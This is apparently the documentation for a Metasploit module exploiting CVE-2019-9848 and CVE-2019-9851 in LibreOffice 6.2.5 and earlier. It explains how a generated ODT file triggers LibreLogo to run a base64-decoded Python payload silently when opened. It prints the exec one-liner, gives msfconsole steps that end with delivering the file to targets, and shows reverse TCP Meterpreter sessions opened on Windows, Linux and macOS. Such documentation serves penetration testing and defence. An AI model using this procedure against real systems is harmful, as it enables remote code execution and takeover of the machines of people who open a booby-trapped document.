## Description

  This module exploits CVE-2019-9848, CVE-2019-9851 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 

  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 

  This module generates an ODT file with a global dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

  The generated document file contains a one-liner python code that executes the python payload generated by metasploit : 

  ```python
  exec(eval(str(__import__('base64').b64decode('#{b64_py_code}'))))
  ```

  To avoid any python error, the `h1` title written in the document is a python comment `#`.
  
  Thanks to Shelby Pace, this module is now platform-independent.

## Vulnerable Application

  LibreOffice version 6.2.5 and prior.

  This module has been tested successfully with:

  * LibreOffice 6.2.4 on Windows 7
  * LibreOffice 6.2.4 on Debian 9.9
  * LibreOffice 6.2.5 on Debian 9.9
  * LibreOffice 6.2.5 on Windows 7
  * LibreOffice 6.2.5 on Windows 10
  * LibreOffice 6.2.5 on Ubuntu 18.04
  * LibreOffice 6.2.5 on macOS 10.13.6

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
  4. Do: ```set LHOST <ip>```
  5. Do: ```set LPORT <port>```
  6. Do: ```run```
  7. Move the generated file to the targets
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
 10. You should get a shell.

## Scenarios

### LibreOffice 6.2.5 on Windows 10

  ```
  msf exploit(multi/handler) > run
  
  [*] Started reverse TCP handler on 192.168.56.4:4444 
  [*] Sending stage (53755 bytes) to 192.168.56.3
  [*] Meterpreter session 3 opened (192.168.56.4:4444 -> 192.168.56.3:51259) at 2019-08-18 08:57:20 -0400
  
  meterpreter > sysinfo
  Computer        : LL
  OS              : Windows 10 (Build 17134)
  Architecture    : x64
  System Language : fr_FR
  Meterpreter     : python/windows
  ```

### LibreOffice 6.2.5 on Ubuntu 18.04
  ```
  msf exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] Sending stage (53755 bytes) to 192.168.37.137
  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.137:46668) at 2019-08-16 15:38:54 -0500

  meterpreter > sysinfo
  Computer        : ubuntu
  OS              : Linux 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019
  Architecture    : x64
  System Language : en_US
  Meterpreter     : python/linux
  ```
  
### LibreOffice 6.2.5 on macOS 10.13.6

  ```
  msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
  payload => python/meterpreter/reverse_tcp
  msf exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.56.4:4444 
  [*] Sending stage (53755 bytes) to 192.168.56.2
  [*] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.2:50795) at 2019-08-18 08:17:43 -0400

  meterpreter > sysinfo
  Computer        : MBP.local
  OS              : Darwin 17
  Architecture    : x64
  System Language : en_GB
  Meterpreter     : python/osx
  ```
